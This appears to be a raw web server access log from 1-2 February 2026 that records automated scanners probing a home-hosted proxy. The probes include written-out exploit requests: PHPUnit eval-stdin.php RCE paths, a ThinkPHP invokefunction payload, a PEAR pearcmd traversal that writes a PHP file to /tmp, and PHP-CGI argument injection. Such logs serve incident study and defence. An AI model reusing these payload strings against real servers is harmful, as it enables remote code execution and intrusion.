"/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:01 +0000] 404 - GET http 78.131.122.113 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:02 +0000] 404 - GET http 78.131.122.113 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:03 +0000] 404 - GET http 78.131.122.113 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:03 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:03 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../tmp/index1" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:02:03 +0000] 404 - GET http 78.131.122.113 "/containers/json" [Client 95.181.174.249] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:22:09:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:22:12:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:14:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:22:16:40 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:18:36 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:22:20:57 +0000] 404 - GET http 78-131-122-113.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.198.89.236] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:22:20:57 +0000] 404 - GET http 78-131-122-113.pool.digikabel.hu "/rip.php" [Client 20.198.89.236] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:22:21:15 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:22:29:40 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:22:30:34 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 134.209.232.120] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:22:30:34 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 134.209.232.120] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:22:30:34 +0000] 404 - GET http 78.131.122.113 "/odinhttpcall1769985034" [Client 134.209.232.120] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:22:30:34 +0000] 404 - POST http 78.131.122.113 "/sdk" [Client 134.209.232.120] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:22:30:34 +0000] 404 - GET http 78.131.122.113 "/HNAP1" [Client 134.209.232.120] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:22:30:35 +0000] 404 - GET http 78.131.122.113 "/evox/about" [Client 134.209.232.120] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:22:30:35 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 134.209.232.120] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:22:30:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 134.209.232.120] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:22:30:35 +0000] 404 - GET http 78.131.122.113 "/solr/admin/info/system" [Client 46.101.127.41] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:22:30:35 +0000] 404 - GET http 78.131.122.113 "/query?q=SHOW+DIAGNOSTICS" [Client 165.227.162.253] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:22:30:35 +0000] 404 - GET http 78.131.122.113 "/v2/_catalog" [Client 167.172.110.232] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:22:30:35 +0000] 404 - GET http 78.131.122.113 "/cgi-bin/authLogin.cgi" [Client 167.172.177.68] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:22:30:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 139.59.210.36] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:22:30:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 164.92.161.240] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:30:35 +0000] 404 - GET http 78.131.122.113 "/solr/admin/cores?action=STATUS&wt=json" [Client 46.101.127.41] [Length 150] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:22:30:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 164.92.161.240] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:30:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 139.59.210.36] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[01/Feb/2026:22:30:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.210.36] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:30:36 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:22:32:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:22:34:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.32.195.85] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:34:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.215.0.144] [Length 1033] [Gzip -] "fasthttp" "-" +[01/Feb/2026:22:34:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:34:43 +0000] 404 - GET http 78.131.122.113 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:22:34:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:34:43 +0000] 404 - GET http 78.131.122.113 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:22:35:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:35:03 +0000] 404 - GET http 78.131.122.113 "/aaa9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:22:35:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:22:35:03 +0000] 404 - GET http 78.131.122.113 "/aab9" [Client 95.215.0.144] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[01/Feb/2026:22:36:07 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.74] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[01/Feb/2026:22:53:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:01:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:10:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:12:22 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:15:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:23:23:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:24:07 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:24:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:39:39 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 37.60.250.29] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:23:39:39 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 37.60.250.29] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:23:39:39 +0000] 404 - POST http 78.131.122.113 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 405 - POST http 78.131.122.113 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 37.60.250.29] [Length 154] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:40 +0000] 404 - GET http 78.131.122.113 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/phpunit/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:41 +0000] 404 - GET http 78.131.122.113 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:42 +0000] 404 - GET http 78.131.122.113 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:43 +0000] 404 - GET http 78.131.122.113 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:44 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:44 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../tmp/index1" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:39:44 +0000] 404 - GET http 78.131.122.113 "/containers/json" [Client 37.60.250.29] [Length 150] [Gzip -] "libredtail-http" "-" +[01/Feb/2026:23:49:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:50:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:55:51 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:23:58:18 +0000] 400 - GET http 78.131.122.113 "/" [Client 206.168.34.211] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[01/Feb/2026:23:58:22 +0000] 400 - - http localhost "-" [Client 206.168.34.211] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:23:59:59 +0000] 400 - GET http 78.131.122.113 "/wiki" [Client 206.168.34.211] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:00:00:42 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:00:00:48 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[02/Feb/2026:00:08:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:00:09:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:00:16:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:00:17:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:00:19:59 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:00:25:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:00:26:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 208.84.101.66] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:00:28:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 143.198.134.113] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:00:28:57 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:00:42:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:00:49:43 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:00:57:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:00:58:52 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:03:11 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:04:21 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:01:05:35 +0000] 200 - GET 